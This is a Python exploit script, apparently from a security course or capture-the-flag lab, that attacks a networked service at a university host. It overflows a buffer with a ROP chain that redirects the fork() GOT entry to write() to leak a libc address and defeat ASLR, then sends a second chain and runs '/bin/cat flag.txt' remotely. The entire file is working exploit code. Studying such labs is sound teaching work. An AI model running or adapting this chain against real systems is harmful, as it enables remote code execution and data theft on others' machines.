import sys
import struct
import socket
import time
# aslr_common define p, recvn and mkrop
from aslr_common import *

host = 'lettieri.iet.unipi.it'
port = 4441

# we use the 'add' gadget to make one of the GOT entries point to write(). We
# need an entry that has already been used, so that it actually points into the
# libc and not into the PLT stub. We choose the 'fork' entry.

# constants
add_Pr15_rdi    = p(0x401206)
pop_rdi         = p(0x4014ab)
pop_rsi_r15     = p(0x4014a9)

# offset of fork in libc.so.6 (nm -D libc.so.6 | grep '\<fork\>')
fork_off        = 0xcb470
# address of the GOT entry for fork (readelf -r aslr1 | grep '\<fork\>')
fork_got        = p(0x403428)
# address of the fork PLT stub (objdump -d aslr1 | grep '<fork@plt>:'
fork_plt        = p(0x401100)
# offset of write in libc.so.6 (nm -D libc.so.6 | grep '\<write\>')
write_off       = 0xeef20
# address of the GOT entry for socketopt (readelf -r aslr1 | grep '\<setsockopt\>')
setsockopt_got  = 0x4033c0
# we cannot (easily) control rdx. However, by studying the binary we see that rdx
# contains 0x200, so we will recevive 0x200 bytes of the GOT, which is fine.

# offset of setsockopt in libc.so.6 (nm -D libc.so.6 | grep '\<setsockopt\>')
setsockopt_off  = 0xff410

pad = b'A'*(0x20+8)

# first chain: turn fork()'s GOT entry into a write() entry and then jump to
# fork@plt, which will then jump to write().
o = pad
o+= pop_rdi
o+= p(write_off - fork_off)
o+= pop_rsi_r15
o+= p(setsockopt_got)
o+= fork_got
o+= add_Pr15_rdi
o+= pop_rdi
o+= p(1)
o+= fork_plt

s = socket.create_connection((host, port))
s.send(o)
b = recvn(s, 0x200)
s.close()
setsockopt_vaddr = struct.unpack('Q', b[:8])[0]
libc_base = setsockopt_vaddr - setsockopt_off

rop = mkrop(pad, libc_base)

print("libc_base: %x" % libc_base)

s = socket.create_connection((host, port))
s.send(rop + (512-len(rop))*b'A')
s.send(b'/bin/cat flag.txt\n')
b = s.recv(200)
sys.stdout.buffer.write(b'flag:      ' + b)
